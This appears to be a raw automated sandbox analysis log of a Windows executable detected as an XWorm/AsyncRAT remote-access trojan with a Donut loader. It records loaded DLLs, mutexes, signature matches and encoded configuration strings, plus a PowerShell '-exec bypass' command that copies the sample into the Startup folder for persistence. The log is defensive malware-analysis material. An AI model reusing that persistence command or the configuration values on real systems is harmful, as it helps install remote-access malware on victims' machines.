Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_09D9A600 0_2_09D9A600
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_01134740 7_2_01134740
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_0113D7BC 7_2_0113D7BC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_04EC7460 7_2_04EC7460
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_04EC1C40 7_2_04EC1C40
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_04EC0088 7_2_04EC0088
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_04EC0078 7_2_04EC0078
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_04EC1C30 7_2_04EC1C30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_054B5CA0 7_2_054B5CA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_054BC4B8 7_2_054BC4B8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_054B2E80 7_2_054B2E80
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_054B7148 7_2_054B7148
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_054B9338 7_2_054B9338
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_054BAA20 7_2_054BAA20
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_06CD345F 7_2_06CD345F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_06CDC019 7_2_06CDC019
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_06CD1478 7_2_06CD1478
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_06D6BE90 7_2_06D6BE90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_07D308E0 7_2_07D308E0
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 2984
Source: KFPYr6f43H.exe, 00000000.00000002.3352034906.000000000162E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs KFPYr6f43H.exe
Source: KFPYr6f43H.exe, 00000000.00000002.3362140251.000000000423A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameStub.dll4 vs KFPYr6f43H.exe
Source: KFPYr6f43H.exe, 00000000.00000000.1712393571.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameEnalib.exe. vs KFPYr6f43H.exe
Source: KFPYr6f43H.exe, 00000007.00000002.2100952372.0000000006D20000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameStub.dll4 vs KFPYr6f43H.exe
Source: KFPYr6f43H.exe, 00000007.00000002.2097282716.00000000039F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameStub.dll4 vs KFPYr6f43H.exe
Source: KFPYr6f43H.exe, 00000007.00000002.2078607715.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs KFPYr6f43H.exe
Source: KFPYr6f43H.exe, 00000007.00000002.2104534573.0000000007D20000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameXClient.exe4 vs KFPYr6f43H.exe
Source: KFPYr6f43H.exe, 00000007.00000002.2081035997.0000000002C26000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameXClient.exe4 vs KFPYr6f43H.exe
Source: KFPYr6f43H.exe Binary or memory string: OriginalFilenameEnalib.exe. vs KFPYr6f43H.exe
Source: KFPYr6f43H.exe.2.dr Binary or memory string: OriginalFilenameEnalib.exe. vs KFPYr6f43H.exe
Source: KFPYr6f43H.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 7.2.KFPYr6f43H.exe.7d20000.3.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 7.2.KFPYr6f43H.exe.7d20000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.KFPYr6f43H.exe.7d20000.3.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 7.2.KFPYr6f43H.exe.7d20000.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.KFPYr6f43H.exe.2c40674.0.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 7.2.KFPYr6f43H.exe.2c40674.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000002.2101523553.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000007.00000002.2081035997.0000000002A66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000007.00000002.2104534573.0000000007D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 00000007.00000002.2104534573.0000000007D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000002.2081035997.00000000029D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000007.00000002.2081035997.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.KFPYr6f43H.exe.7d20000.3.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.KFPYr6f43H.exe.7d20000.3.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.KFPYr6f43H.exe.7d20000.3.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, Settings.cs Base64 encoded string: 'VLENjhkLop199YkKViNxszBsIsKoCLvPWmOU//3uiZw89xpEEx81IPNRZbGcDgxO', 'UBvkytp2nrT3bY1lIk8krZFCzShxdI6H1lfbRwZCx37tRSV3DzlbbVEIa2W3hvJ4'
Source: 7.2.KFPYr6f43H.exe.7d20000.3.raw.unpack, Settings.cs Base64 encoded string: 'VLENjhkLop199YkKViNxszBsIsKoCLvPWmOU//3uiZw89xpEEx81IPNRZbGcDgxO', 'UBvkytp2nrT3bY1lIk8krZFCzShxdI6H1lfbRwZCx37tRSV3DzlbbVEIa2W3hvJ4'
Source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.KFPYr6f43H.exe.7d20000.3.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.2.KFPYr6f43H.exe.7d20000.3.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.spre.troj.adwa.evad.winEXE@9/13@1/2
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_089C1CF0 AdjustTokenPrivileges, 0_2_089C1CF0
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_089C1CB1 AdjustTokenPrivileges, 0_2_089C1CB1
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_089C30F0 AdjustTokenPrivileges, 0_2_089C30F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_07D31CF0 AdjustTokenPrivileges, 7_2_07D31CF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Code function: 7_2_07D33118 AdjustTokenPrivileges, 7_2_07D33118
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Mutant created: \Sessions\1\BaseNamedObjects\WlO6Om8yfxIARVE4
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7304
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upf2x1ni.54b.ps1 Jump to behavior
Source: KFPYr6f43H.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KFPYr6f43H.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: KFPYr6f43H.exe Virustotal: Detection: 51%
Source: KFPYr6f43H.exe ReversingLabs: Detection: 42%
Source: unknown Process created: C:\Users\user\Desktop\KFPYr6f43H.exe "C:\Users\user\Desktop\KFPYr6f43H.exe"
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\Desktop\KFPYr6f43H.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 2984
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\Desktop\KFPYr6f43H.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe' -Force Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
